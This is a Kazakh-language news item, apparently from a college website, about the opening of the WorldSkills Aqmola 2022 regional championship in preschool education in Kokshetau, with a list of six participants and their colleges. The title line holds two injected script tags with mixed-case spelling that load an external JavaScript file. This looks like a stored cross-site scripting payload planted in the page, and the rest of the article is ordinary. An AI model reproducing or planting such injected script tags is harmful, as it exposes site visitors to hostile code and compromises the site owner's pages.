«МЕКТЕПКЕ ДЕЙІНГІ ТӘРБИЕ» ҚҰЗІРЕТТІЛІГІ БОЙЫНША «WORLDSKILLS АQMOLA – 2022» АЙМАҚТЫҚ ЧЕМПИОНАТЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.04.2022
Ағымдағы жылдың 12 сәуір күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Мектепке дейінгі тәрбие» құзіреттілігі бойынша өткізіліп жатқан  «WorldSkills Аqmola – 2022» аймақтық чемпионатының алғашқы кезеңі басталды.  
Білім бәйгесінде қатысушылар «Мектепке дейінгі балаларды оқыту және тәрбиелеу» А және «Мектеп жасына дейінгі балалармен іс-әрекеттің және қарым-қатынастың әр түрін ұйымдастыру» С модульдері бойынша бақ сынауда.  Онда компатриоттар мен техникалық эксперттер демократиялық принципке негізделген сәтті әрі шынайы,  ашық әрі әділ бағалау жүйесін жүргізеді.  «Мектепке дейінгі тәрбие» құзіреттілігі бойынша өткізіліп отырған «WorldSkills Аqmola – 2022» аймақтық чемпионатының қатысушылары:
1. Муканова Жансия –  «Арна» Көкшетау жоғары колледжі, Көкшетау қаласы;
2. Андреева Нина Сергеевна – Жоғары педагогикалық колледжі, Щучинск қаласы;
3. Самбурова Анастасия – Азаматтық қорғаныс көпсалалы колледжі, Көкшетау қаласы;
4. Фомина Виктория – Жоғары қазақ-гуманитарлық техникалық колледжі, Көкшетау қаласы;
5. Холикова Регина – «Мақсат» колледжі, Степногорск қаласы;
6. Бельгумбаева Анара – Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі; Көкшетау қаласы.
Барлық қатысушыларға толағай табыс пен таудай бақ тілейміз! Сәттілік серік болсын!
Просмотров: 1022


Пікір қосу



Деректерді қолтаңбаға қосу